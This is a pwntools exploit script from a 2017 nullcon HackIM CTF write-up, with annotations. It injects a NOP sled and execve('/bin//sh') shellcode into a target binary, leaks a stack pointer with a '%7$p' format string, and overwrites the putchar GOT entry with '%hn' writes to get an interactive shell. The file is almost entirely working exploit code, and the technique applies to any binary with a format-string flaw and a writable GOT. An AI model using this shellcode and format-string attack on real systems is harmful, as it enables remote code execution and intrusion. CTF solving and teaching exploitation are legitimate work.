Tags: #exploit 


#!/usr/bin/env python

from pwn import *
import sys

# nullcon HackIM CTF - 2017
# Task: Exploitation Question 1 - 200 pts
# Author: Simone Ferrini

def choose(r, c):
    """Send menu selection ``c`` to the target tube ``r`` as a single line.

    ``r`` is whatever object the caller passes (a pwntools tube in this
    script); only its ``sendline`` method is used.
    """
    send_line = r.sendline
    send_line(c)

def insert(r):
    """Drive menu option 1: submit the fixed payload, then answer the
    book-id prompt with ``1``.

    The payload is eight ``0x90`` bytes followed by a fixed 23-byte string
    (it embeds ``/bin//sh``); the bytes are sent verbatim, exactly as in
    the original write-up.
    """
    sled = "\x90" * 8
    code = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
    choose(r, '1')
    r.sendline(sled + code)
    r.recvuntil('Enter book id:')
    r.sendline('1')

def leak(r):
    """Drive menu option 3 with the query ``%7$p`` and return the reply.

    Only the slice ``[16:-1]`` of the line that comes back is returned,
    i.e. the leaked pointer text with the prompt prefix and the trailing
    newline stripped.  The exact reply layout is assumed, not checked.
    """
    choose(r, '3')
    r.recvuntil('Enter query: ')
    r.sendline("%7$p")
    reply = r.recvline()
    return reply[16:-1]

def pwn(r, l):
    """Rewrite the ``putchar`` GOT slot with a format-string write.

    ``l`` is the text returned by :func:`leak`; two 16-bit values derived
    from it become the field widths of the ``%hn`` directives below.  The
    query starts with two packed addresses (slot and slot + 2) so that the
    positional arguments ``%11$`` and ``%12$`` resolve to them.

    Defender's note: this only works because the binary lets attacker
    text reach a ``printf``-family format argument and the GOT is
    writable; ``-Wformat-security`` / ``FORTIFY_SOURCE`` catch the former,
    Full RELRO removes the latter.
    """
    choose(r, '3')
    r.recvuntil('Enter query: ')

    # Split the leaked value into its high and low 16-bit halves.  The
    # slice bounds encode the exact layout of the leaked line -- TODO
    # confirm: for a 10-character "0x........" string, l[5:] is five hex
    # digits, not four.
    high = int(l[2:-4], 16)
    low = int(l[5:], 16)

    # Presumably compensates for the 8 bytes (two p32 addresses) already
    # emitted before the first %hn; the second width is relative to the
    # first because %n reports the cumulative byte count.
    high = high - (4 + 4)
    low = low - high

    # Fixed GOT address from the write-up; a constant like this implies a
    # non-PIE build -- not verifiable from here.
    putchar_got = 0x0804b038

    got_to_override = putchar_got
    # <slot><slot+2> "%<high>x%12$hn" "%<low>x%11$hn": each %hn stores a
    # 16-bit count at the address held in that argument position.
    r.sendline(p32(got_to_override) + p32(got_to_override + 2) + "%" + str(high) + "x%12$hn" + "%" + str(low) + "x%11$hn")

def exploit(r):
    """Run the three stages against tube ``r``, then hand the session to
    the user: plant the payload, leak a value, feed it to :func:`pwn`.
    """
    insert(r)
    leaked = leak(r)
    pwn(r, leaked)
    r.interactive()

if __name__ == "__main__":
    # Usage hint: with HOST PORT on the command line the target is remote,
    # otherwise a local ``level1.bin`` is started and paused so a debugger
    # can attach to the printed pid before the stages run.
    log.info("For remote: %s HOST PORT" % sys.argv[0])
    if len(sys.argv) > 1:
        r = remote(sys.argv[1], int(sys.argv[2]))
    else:
        r = process(['level1.bin'])
        print(util.proc.pidof(r))
        pause()
    exploit(r)

Original writeup (https://gist.github.com/sferrini/54a893a7e147a0681e8c441d8d72895b).